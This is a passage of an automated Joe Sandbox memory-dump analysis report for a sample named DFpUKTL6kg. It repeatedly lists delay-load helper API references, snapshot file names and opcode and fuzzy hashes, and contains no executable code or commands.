                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 7c85fc4cf95f7291ef20a1d82b494b65fd116d0f6352a496df8cfac077670e57
                  • Instruction ID: 4c6c0999a2f30ce1b22f267587ec6f72a32b4d989e246d2cd25caf4398f60636
                  • Opcode Fuzzy Hash: 7c85fc4cf95f7291ef20a1d82b494b65fd116d0f6352a496df8cfac077670e57
                  • Instruction Fuzzy Hash: 71A011A3ABC00BBEB0082280BE02C3A032CC8C0B20338CC2AB00AA00C0A88028080830
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 6981217fcdc37f847fab1588b0433ebf2bd6f99807749b5a8c5b27c22f260dd3
                  • Instruction ID: 4c6c0999a2f30ce1b22f267587ec6f72a32b4d989e246d2cd25caf4398f60636
                  • Opcode Fuzzy Hash: 6981217fcdc37f847fab1588b0433ebf2bd6f99807749b5a8c5b27c22f260dd3
                  • Instruction Fuzzy Hash: 71A011A3ABC00BBEB0082280BE02C3A032CC8C0B20338CC2AB00AA00C0A88028080830
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DAB2
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: c20bb2e9d50518301cd09448e1aacf1a5ff03e441c6baddeb1ea742e4d620c27
                  • Instruction ID: 36dd52705e428e47cfd77fd64cc24bdff2111fc3a6fd26832b0bb0efc2bb27e5
                  • Opcode Fuzzy Hash: c20bb2e9d50518301cd09448e1aacf1a5ff03e441c6baddeb1ea742e4d620c27
                  • Instruction Fuzzy Hash: A4A012A337C0067C70087185BE02C3A031CD0C0B11330891AF006940C8558018044830
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DAB2
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 5dd821e239931dd8e60061357583753ac46cdfbdccdde88c58323e197d60fe1e
                  • Instruction ID: befbeb31be52a6c3288dcc0e4506cecbaa948e55dfca0218a7ae8ca7dcc7027c
                  • Opcode Fuzzy Hash: 5dd821e239931dd8e60061357583753ac46cdfbdccdde88c58323e197d60fe1e
                  • Instruction Fuzzy Hash: D0A002A767D117BD710871957E16D7A035CD4C4B513348D1AF506940C9558458455831
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DAB2
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 43599d02561c2358a638a450fe37fd1cf87659f9f7f67e0caf1505779f8e6952
                  • Instruction ID: befbeb31be52a6c3288dcc0e4506cecbaa948e55dfca0218a7ae8ca7dcc7027c
                  • Opcode Fuzzy Hash: 43599d02561c2358a638a450fe37fd1cf87659f9f7f67e0caf1505779f8e6952
                  • Instruction Fuzzy Hash: D0A002A767D117BD710871957E16D7A035CD4C4B513348D1AF506940C9558458455831
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DAB2
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: d2e8728db5fbdf94109b857dd50c16f0554da730fefbec15531ca06516b70061
                  • Instruction ID: befbeb31be52a6c3288dcc0e4506cecbaa948e55dfca0218a7ae8ca7dcc7027c
                  • Opcode Fuzzy Hash: d2e8728db5fbdf94109b857dd50c16f0554da730fefbec15531ca06516b70061
                  • Instruction Fuzzy Hash: D0A002A767D117BD710871957E16D7A035CD4C4B513348D1AF506940C9558458455831
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DAB2
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: a63962ee97f6a2cd95ff554ad2bf4ca4fcab1488db883ba4985d2d76fab331d4
                  • Instruction ID: befbeb31be52a6c3288dcc0e4506cecbaa948e55dfca0218a7ae8ca7dcc7027c
                  • Opcode Fuzzy Hash: a63962ee97f6a2cd95ff554ad2bf4ca4fcab1488db883ba4985d2d76fab331d4
                  • Instruction Fuzzy Hash: D0A002A767D117BD710871957E16D7A035CD4C4B513348D1AF506940C9558458455831
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DAB2
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: c42072e6be21b5d5f43fca2ddc9e2afbab185edc7c88370893ae5903083974d9
                  • Instruction ID: befbeb31be52a6c3288dcc0e4506cecbaa948e55dfca0218a7ae8ca7dcc7027c
                  • Opcode Fuzzy Hash: c42072e6be21b5d5f43fca2ddc9e2afbab185edc7c88370893ae5903083974d9
                  • Instruction Fuzzy Hash: D0A002A767D117BD710871957E16D7A035CD4C4B513348D1AF506940C9558458455831
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DBD5
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 2f00931c4aa1efe833b8044903ac2cb426c0272536aa2c13a2e1aac1345fa491
                  • Instruction ID: 436f71f4c0abd78371fa378e4796933ff36591cb9f02966682fba77e1c0f1005
                  • Opcode Fuzzy Hash: 2f00931c4aa1efe833b8044903ac2cb426c0272536aa2c13a2e1aac1345fa491
                  • Instruction Fuzzy Hash: F4A011AB2BC00BBCB00822803E0BCBA033CE8C0B203328C2ABA0A800C0AA800C080830
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DBD5
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 9fc2a0e9cb7ee54daf6c3cdf72f1a3cbb5859832435ea7a44708d3fcc602115a
                  • Instruction ID: 436f71f4c0abd78371fa378e4796933ff36591cb9f02966682fba77e1c0f1005
                  • Opcode Fuzzy Hash: 9fc2a0e9cb7ee54daf6c3cdf72f1a3cbb5859832435ea7a44708d3fcc602115a
                  • Instruction Fuzzy Hash: F4A011AB2BC00BBCB00822803E0BCBA033CE8C0B203328C2ABA0A800C0AA800C080830
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DBD5
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
